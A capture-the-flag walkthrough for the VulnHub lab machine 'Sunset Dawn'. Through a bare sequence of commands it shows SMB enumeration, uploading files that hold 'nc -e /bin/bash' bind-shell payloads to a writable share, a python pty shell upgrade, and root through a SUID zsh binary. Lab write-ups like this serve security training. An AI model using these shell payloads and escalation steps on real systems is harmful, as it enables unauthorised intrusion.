SUNSET DAWN (VULNHUB)

LINK: https://download.vulnhub.com/sunset/dawn.zip

root@kali:~# nmap -A 192.168.1.165

port : 80 , 139 , 445 , 3306

Enumeration :
on browser
http://192.168.1.165

root@kali:~# dirb http://192.168.1.165/

we get /logs/

now on browser

http://192.168.1.165/logs/

we get management.log

now on terminal

root@kali:~# cd Downloads

root@kali:~# cat management.log

root@kali:~# enum4linux -a 192.168.1.165

root@kali:~# smbclient //192.168.1.165/ITDEPT

smb: \> ls
smb: \> ls -al

root@kali:~# echo “nc -e /bin/bash -lvp 1234 &” > product-control
root@kali:~# echo “nc -e /bin/bash -lvp 1235 &” > web-control
root@kali:~# ls

root@kali:~# cat product-control

on smb

smb: \> put product-control

smb: \> put web-control

smb: \> ls

on another terminal

root@kali:~# nc 192.168.1.165 1234

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Privilege Escalation:

dawn@dawn:~$ find / -perm -u=s -type f 2>/dev/null

dawn@dawn:~$ whoami
dawn@dawn:~$ /usr/bin/zsh
dawn@dawn:~$ whoami
dawn@dawn:~$ cd /root
dawn@dawn:~$ ls
dawn@dawn:~$ cat flag.txt

@SAKSHAM DIXIT